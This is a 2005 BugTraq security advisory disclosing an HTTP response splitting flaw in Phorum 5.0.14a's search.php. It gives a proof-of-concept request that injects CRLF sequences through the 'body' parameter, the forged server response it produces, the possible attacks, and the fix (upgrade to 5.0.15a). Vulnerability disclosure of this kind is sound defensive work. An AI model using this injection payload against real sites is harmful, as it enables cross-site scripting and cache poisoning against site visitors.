BugTraq
[ Positive Technologies #SA] Phorum "location" HTTP Response Splitting Vulnerability Mar 22 2005 02:37PM
Alexander Anisimov (anisimov ptsecurity com)


[ Positive Technologies SA-20050322 ]
Phorum "location" HTTP Response Splitting Vulnerability.

Release Date: 03/22/2005
Date Reported: 03/10/2005
Severity: Medium
Application: Phorum
Platform: PHP
Vendor: http://www.phorum.org
Affects versions: 5.0.14a
Other versions may also be affected.

I. BACKGROUND

Phorum is a web based message board written in PHP. Phorum is designed
with high-availability and visitor ease of use in mind. Features such
as mailing list integration, easy customization and simple installation
make Phorum a powerful add-in to any website.

II. DESCRIPTION

Input passed to the "Location" parameter is not properly sanitised.
This can be exploited to inject malicious characters into HTTP headers
and may allow execution of arbitrary HTML and script code in a user's
browser session in context of an affected site.

Request:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aConten
t-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/h
tml%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=AL
L&match_dates=30

Result:

HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,matc
h_dates=30,match_forum=ALL,body=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34

<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html

<...>

This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting).

The vulnerability has been reported in Phorum version 5.0.14.
Other versions may also be affected.

III. ANALYSIS

Exploitation of this vulnerability allows remote attackers to mount various
kinds of attacks. For example: Cross-Site Scripting (XSS), Web Cache
Poisoning (deface), Browser cache poisoning, Hijacking pages with
user-specific information and etc...

IV. SOLUTION
Update to version 5.0.15a.

http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus